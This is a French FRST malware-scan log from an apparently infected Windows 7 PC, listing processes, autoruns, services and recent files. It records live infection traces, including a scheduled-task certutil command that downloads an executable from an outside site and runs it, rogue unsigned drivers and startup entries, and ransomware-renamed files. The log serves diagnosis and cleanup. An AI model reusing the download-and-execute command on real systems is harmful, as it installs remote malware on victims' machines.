Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 15-11-2020
Exécuté par Mohand (administrateur) sur SERVEUR_PPC (Acer Veriton M275) (15-11-2020 19:17:34)
Exécuté depuis C:\Users\Mohand\Downloads
Profils chargés: Mohand
Platform: Windows 7 Home Premium Service Pack 1 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

() [Fichier non signé] C:\Users\Mohand\Downloads\RAV.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.32\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.32\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <13>
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\vVX3000.exe
(Realtek Semiconductor Corp -> ) C:\Windows\runSW.exe
(Realtek Semiconductor Corp -> Realtek) C:\Windows\SwUSB.exe
(SOSVIRUS (LE BOZEC CEDRIC, DOMINIQUE, MARIE) -> ) C:\Program Files (x86)\UsbFix\Modules\UsbFixMonitor.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [328048 2011-01-21] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [VX3000] => C:\Windows\vVX3000.exe [762736 2010-05-20] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-10-16] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [CaptureOnTouch] => C:\Program Files (x86)\Canon Electronics\CaptureOnTouch\TouchDR.exe [3021568 2019-04-22] (CANON ELECTRONICS INC -> Canon Electronics Inc.)
HKLM-x32\...\RunOnce: [] => [X]
HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Run: [DivineFog] => C:\Windows\rss\csrss.exe [4024320 2020-11-02] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Run: [CloudNet] => C:\Users\Mohand\AppData\Roaming\a497077cbc56\a497077cbc56.exe [549376 2020-11-03] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Run: [ares] => "C:\Program Files (x86)\Ares\Ares.exe" -h
HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Policies\Explorer: [NoFind] 0
HKLM\...\Windows x64\Print Processors\hpzpplhn: C:\Windows\System32\spool\prtprocs\x64\hpzpplhn.dll [99840 2008-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard Corporation)
HKLM\...\Print\Monitors\KM Language Monitor: C:\Windows\system32\KMPJL64.DLL [125232 2019-08-22] (Microsoft Windows Hardware Compatibility Publisher -> KYOCERA Document Solutions Inc.)
HKLM\...\Print\Monitors\KX Language Monitor: C:\Windows\system32\KXPLM64.DLL [100352 2015-09-11] (Microsoft Windows Hardware Compatibility Publisher -> KYOCERA Document Solutions Inc.)
HKLM\...\Print\Monitors\PJL Language Monitor: C:\Windows\system32\PJLMON.DLL [22016 2010-11-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\86.0.4240.193\Installer\chrmstp.exe [2020-11-10] (Google LLC -> Google LLC)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {120FEE0C-50F4-4397-96EB-02514BA76E7A} - System32\Tasks\UsbFix Boot Scan => C:\Program Files (x86)\UsbFix\UsbFix.exe [2053256 2020-08-02] (SOSVIRUS (LE BOZEC CEDRIC, DOMINIQUE, MARIE) -> )
Task: {1C80F9EA-8437-46C3-BCCA-7B871E168173} - \csrss -> Pas de fichier <==== ATTENTION
Task: {323F6B05-746E-4479-88A4-65B9308363B5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1341008 2020-09-06] (Adobe Inc. -> Adobe Inc.)
Task: {37329927-67DB-4E40-A137-7571FAB305D3} - System32\Tasks\BlueStacksHelper => C:\ProgramData\BlueStacks\Client\Helper\BlueStacksHelper.exe [752136 2020-10-16] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
Task: {5AE0248B-E2DE-415F-9BBE-7F523216443C} - System32\Tasks\UsbFix Monitor => C:\Program Files (x86)\UsbFix\Modules\UsbFixMonitor.exe [1239176 2020-08-02] (SOSVIRUS (LE BOZEC CEDRIC, DOMINIQUE, MARIE) -> )
Task: {6C5E932F-EC10-4258-8C78-AD00DABDEC35} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-11-06] (Google LLC -> Google LLC)
Task: {C159C071-7B11-4897-B7BC-5453554CDB01} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-11-06] (Google LLC -> Google LLC)
Task: {CFDB67CA-711B-402F-A2B9-4CFEF863FEB0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://babsitef.com/app/app.exe C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {F46FC72A-4232-4B90-862D-D0BF4DE757DF} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616832 2019-09-04] (Apple Inc. -> Apple Inc.)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\..\Interfaces\{16ABF730-1412-484B-9933-80E068FF9135}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{898987E4-E015-47B0-8740-224B603CD6C5}: [NameServer] 192.168.1.1
HKLM\System\...\Parameters\PersistentRoutes: [0.0.0.0,0.0.0.0,192.168.1.1,-1]

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Pas de fichier]
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2012-03-17] (VideoLAN) [Fichier non signé]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-10-22] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default [2020-11-15]
CHR Notifications: Default -> hxxps://best.aliexpress.com; hxxps://usersdrive.com; hxxps://www.lemonde.fr
CHR Extension: (Slides) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-06]
CHR Extension: (Docs) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-06]
CHR Extension: (Google Drive) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-06]
CHR Extension: (YouTube) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-06]
CHR Extension: (Sheets) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-06]
CHR Extension: (Google Docs hors connexion) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-06]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-06]
CHR Extension: (Gmail) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-06]
CHR Extension: (Chrome Media Router) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-06]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169544 2020-09-06] (Adobe Inc. -> Adobe Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-09-24] (Apple Inc. -> Apple Inc.)
R2 RunSwUSB; C:\Windows\runSW.exe [44760 2014-12-15] (Realtek Semiconductor Corp -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier)
S2 MSCamSvc; "C:\Program Files\Microsoft LifeCam\MSCamS64.exe" [X]

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 BlueStacksDrv; C:\Program Files\BlueStacks\BstkDrv_bgp.sys [315976 2019-12-12] (Bluestack Systems, Inc -> Bluestack System Inc.)
S3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [5086464 2016-04-05] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2020-04-15] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-11-02] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé]

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

==================== Un mois (créés) ===================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2020-11-15 19:17 - 2020-11-15 19:18 - 000011828 _____ C:\Users\Mohand\Downloads\FRST.txt
2020-11-15 19:16 - 2020-11-15 19:18 - 000000000 ____D C:\FRST
2020-11-15 19:15 - 2020-11-15 19:15 - 002294784 _____ (Farbar) C:\Users\Mohand\Downloads\FRST64.exe
2020-11-15 19:09 - 2020-11-15 19:14 - 000001887 _____ C:\Users\Public\Desktop\UsbFix Anti-Malware.lnk
2020-11-15 19:09 - 2020-11-15 19:14 - 000001887 _____ C:\ProgramData\Desktop\UsbFix Anti-Malware.lnk
2020-11-15 19:09 - 2020-11-15 19:09 - 000003206 _____ C:\Windows\system32\Tasks\UsbFix Monitor
2020-11-15 19:09 - 2020-11-15 19:09 - 000003204 _____ C:\Windows\system32\Tasks\UsbFix Boot Scan
2020-11-15 18:25 - 2020-11-15 18:25 - 002276352 _____ () C:\Users\Mohand\Downloads\RAV.exe
2020-11-15 18:11 - 2020-11-15 19:09 - 000000000 ____D C:\Program Files (x86)\UsbFix
2020-11-15 18:11 - 2020-11-15 18:11 - 005355288 _____ (SOSVirus) C:\Users\Mohand\Downloads\UsbFix_2020.exe
2020-11-15 18:05 - 2020-11-15 18:05 - 000000000 ____D C:\Rem-VBSqt
2020-11-15 18:02 - 2020-11-15 18:08 - 000000000 ____D C:\Users\Mohand\Downloads\Rem-VBSworm
2020-11-15 18:02 - 2020-11-15 18:02 - 000062792 _____ C:\Users\Mohand\Downloads\Rem-VBSworm.zip
2020-11-13 17:20 - 2020-11-15 18:37 - 592577300 _____ C:\Users\Mohand\Downloads\iPhone_4.7_P3_14.2_18B92_Restore.ipsw
2020-11-12 13:49 - 2020-11-12 13:50 - 000012735 _____ C:\Users\Mohand\Downloads\[Torrentz2k.xyz]__100.Years.3D.Film.SBS.[1080p].m2ts.torrent
2020-11-12 13:35 - 2020-11-12 13:36 - 000000000 ____D C:\Users\Mohand\Documents\logiciel
2020-11-11 14:24 - 2020-11-15 19:05 - 000000000 ____D C:\Program Files (x86)\Tenorshare ReiBoot
2020-11-09 15:55 - 2020-11-09 15:55 - 000001197 _____ C:\Users\Public\Desktop\iMyFone LockWiper.lnk
2020-11-09 15:55 - 2020-11-09 15:55 - 000001197 _____ C:\ProgramData\Desktop\iMyFone LockWiper.lnk
2020-11-09 15:55 - 2020-11-09 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMyFone LockWiper
2020-11-09 15:55 - 2020-11-09 15:55 - 000000000 ____D C:\Program Files (x86)\activated
2020-11-09 15:49 - 2020-11-12 13:50 - 000000000 ____D C:\Users\Mohand\Documents\Vuze Downloads
2020-11-09 15:49 - 2020-11-09 15:49 - 000001794 _____ C:\Users\Public\Desktop\Vuze.lnk
2020-11-09 15:49 - 2020-11-09 15:49 - 000001794 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk
2020-11-09 15:49 - 2020-11-09 15:49 - 000001794 _____ C:\ProgramData\Desktop\Vuze.lnk
2020-11-09 15:49 - 2020-11-09 15:49 - 000000000 ____D C:\Program Files\Vuze
2020-11-09 15:47 - 2020-11-09 15:47 - 000091808 _____ (Azureus Software, Inc.) C:\Users\Mohand\Downloads\vuze_5-7-6-0_fr_11926.exe
2020-11-08 20:08 - 2020-11-08 20:08 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\SPTemp
2020-11-08 17:24 - 2020-11-09 15:45 - 000000000 ____D C:\Program Files (x86)\Ares
2020-11-08 17:24 - 2020-11-08 17:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ares
2020-11-08 17:05 - 2020-11-09 15:55 - 000000000 ____D C:\Program Files (x86)\iMyFone
2020-11-08 17:03 - 2020-11-08 17:03 - 000000000 ____D C:\Program Files (x86)\imyfone_down
2020-11-08 16:49 - 2020-11-08 16:49 - 000000000 ____D C:\Users\Mohand\AppData\Local\Apple Computer
2020-11-08 16:43 - 2020-11-08 16:50 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\Apple Computer
2020-11-08 16:40 - 2020-11-08 16:40 - 000001747 _____ C:\Users\Public\Desktop\iTunes.lnk
2020-11-08 16:40 - 2020-11-08 16:40 - 000001747 _____ C:\ProgramData\Desktop\iTunes.lnk
2020-11-08 16:40 - 2020-11-08 16:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2020-11-08 16:40 - 2020-11-08 16:40 - 000000000 ____D C:\Program Files\iPod
2020-11-08 16:39 - 2020-11-08 16:40 - 000000000 ____D C:\Program Files\iTunes
2020-11-08 16:39 - 2020-11-08 16:39 - 000000000 ____D C:\ProgramData\Apple Computer
2020-11-08 16:38 - 2020-11-08 16:38 - 000002519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Windows\system32\Tasks\Apple
2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Users\Mohand\AppData\Local\Apple
2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\ProgramData\Apple
2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files\Common Files\Apple
2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files\Bonjour
2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files (x86)\Bonjour
2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files (x86)\Apple Software Update
2020-11-07 17:11 - 2020-11-07 17:11 - 000000522 ___SH C:\Users\Public\Documents\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER
2020-11-07 17:11 - 2020-11-07 17:11 - 000000522 ___SH C:\ProgramData\Documents\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER
2020-11-07 17:11 - 2020-11-07 17:11 - 000000410 ___SH C:\Users\Public\Downloads\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER
2020-11-07 17:11 - 2020-11-07 17:11 - 000000410 ___SH C:\Users\Public\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER
2020-11-06 19:39 - 2020-11-06 19:39 - 000001066 _____ C:\Users\Mohand\Desktop\VLC media player.lnk
2020-11-06 16:53 - 2020-11-06 16:53 - 000000000 ____D C:\Users\Mohand\.swt
2020-11-06 16:52 - 2020-11-12 19:35 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\Azureus
2020-11-06 16:51 - 2020-11-06 16:51 - 000000000 ____D C:\ProgramData\Oracle
2020-11-06 16:35 - 2020-11-10 10:29 - 000002168 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-11-06 16:35 - 2020-11-10 10:29 - 000002127 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-11-06 16:35 - 2020-11-10 10:29 - 000002127 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-11-06 16:33 - 2020-11-06 16:39 - 000003502 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-11-06 16:33 - 2020-11-06 16:39 - 000003374 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-11-04 18:08 - 2020-11-04 18:08 - 000000000 ____D C:\Tenorshare
2020-11-04 17:17 - 2020-11-04 18:12 - 000000000 ____D C:\Program Files (x86)\02ex9jo83dlt
2020-11-04 17:16 - 2020-11-04 17:16 - 000002059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-11-04 17:16 - 2020-11-04 17:16 - 000002047 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2020-11-04 17:16 - 2020-11-04 17:16 - 000002047 _____ C:\ProgramData\Desktop\Acrobat Reader DC.lnk
2020-11-03 10:17 - 2020-11-03 10:17 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\a497077cbc56
2020-11-02 19:41 - 2020-11-02 19:41 - 000000000 ____D C:\Program Files (x86)\gdiview
2020-11-02 19:34 - 2020-11-02 19:34 - 399973115 _____ C:\Windows\MEMORY.DMP
2020-11-02 19:34 - 2020-11-02 19:34 - 000276800 _____ C:\Windows\Minidump\110220-40310-01.dmp
2020-11-02 19:34 - 2020-11-02 19:34 - 000000000 ____D C:\Windows\Minidump
2020-11-02 19:31 - 2020-11-02 19:41 - 000000000 ____D C:\Program Files (x86)\ti1ny7mqy2p4
2020-11-02 19:31 - 2020-11-02 19:31 - 000000000 ____D C:\ProgramData\sib
2020-11-02 19:29 - 2020-11-02 19:29 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-11-02 19:28 - 2020-11-15 10:33 - 000003494 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-11-02 19:28 - 2020-11-02 19:29 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-11-02 19:28 - 2020-11-02 19:29 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-10-30 11:10 - 2020-10-30 11:09 - 000035385 _____ C:\Users\Mohand\Desktop\30-10-2020-attestation-de-deplacement-derogatoire.pdf
2020-10-29 18:17 - 2020-10-29 18:17 - 000043997 _____ C:\Users\Mohand\Desktop\atestation profetionel.pdf
2020-10-29 16:19 - 2020-10-29 16:19 - 000620596 _____ C:\Users\Mohand\Downloads\21-09-2020-attestation-de-deplacement-vers-la-france-metropolitaine.pdf
2020-10-25 17:45 - 2020-10-25 17:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UTAX TA
2020-10-25 16:43 - 2020-10-25 16:43 - 000001086 _____ C:\Users\Mohand\Desktop\Your Unin-staller!.lnk
2020-10-25 16:43 - 2020-10-25 16:43 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\URSoft
2020-10-25 16:43 - 2020-10-25 16:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Your Uninstaller 2010
2020-10-25 16:43 - 2020-10-25 16:43 - 000000000 ____D C:\Program Files (x86)\Your Uninstaller 2010
2020-10-20 16:09 - 2020-10-20 16:09 - 000000000 ____D C:\Program Files\Google
2020-10-19 16:47 - 2015-09-11 09:32 - 000100352 _____ (KYOCERA Document Solutions Inc.) C:\Windows\system32\KXPLM64.DLL
2020-10-19 16:42 - 2020-11-15 19:04 - 000000000 ____D C:\ProgramData\temp

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2020-11-15 18:22 - 2011-04-12 10:16 - 000746916 _____ C:\Windows\system32\perfh00C.dat
2020-11-15 18:22 - 2011-04-12 10:16 - 000149440 _____ C:\Windows\system32\perfc00C.dat
2020-11-15 18:22 - 2009-07-14 06:13 - 001667292 _____ C:\Windows\system32\PerfStringBackup.INI
2020-11-15 18:22 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-11-15 10:41 - 2009-07-14 05:45 - 000032064 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-11-15 10:41 - 2009-07-14 05:45 - 000032064 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-11-15 10:33 - 2020-01-17 10:32 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-11-15 10:33 - 2009-07-14 06:08 - 000032496 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2020-11-15 10:33 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-11-11 14:51 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\LiveKernelReports
2020-11-07 17:13 - 2011-04-12 10:27 - 000000000 ___RD C:\Users\Public\Recorded TV
2020-11-07 17:11 - 2020-02-26 17:20 - 000000000 ____D C:\Users\Public\BlueStacks
2020-11-07 17:11 - 2009-07-14 04:20 - 000000000 __RHD C:\Users\Public\Libraries
2020-11-06 16:53 - 2020-01-14 12:41 - 000000000 ____D C:\Users\Mohand
2020-11-06 16:33 - 2020-01-15 13:31 - 000000000 ____D C:\Program Files (x86)\Google
2020-11-06 16:26 - 2020-01-14 12:41 - 000001429 _____ C:\Users\Mohand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2020-11-04 17:18 - 2020-01-15 20:34 - 000000000 ____D C:\Users\Mohand\AppData\Local\Adobe
2020-11-04 17:17 - 2020-05-01 12:57 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-11-04 17:14 - 2020-01-15 15:08 - 000000000 ____D C:\ProgramData\Adobe
2020-11-04 16:54 - 2020-01-14 18:50 - 000000000 ____D C:\Users\Mohand\AppData\Local\Google
2020-11-02 19:52 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\NDF
2020-10-29 23:06 - 2010-11-21 04:27 - 000795000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-10-29 10:11 - 2020-04-13 08:40 - 000249466 _____ C:\Windows\ntbtlog.txt
2020-10-28 19:08 - 2020-01-14 12:42 - 000138912 _____ C:\Users\Mohand\AppData\Local\GDIPFONTCACHEV1.DAT
2020-10-25 18:49 - 2009-07-14 05:45 - 000526168 _____ C:\Windows\system32\FNTCACHE.DAT
2020-10-25 17:45 - 2020-01-16 16:43 - 000000000 ____D C:\Program Files\UTAX TA
2020-10-19 16:43 - 2020-01-16 16:48 - 000000000 ____D C:\Users\Mohand\AppData\Local\ElevatedDiagnostics
2020-10-19 09:49 - 2020-02-26 17:46 - 000003872 _____ C:\Windows\system32\Tasks\BlueStacksHelper

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restauré(es) avec succès

LastRegBack: 2020-11-13 10:51

==================== Fin de FRST.txt ========================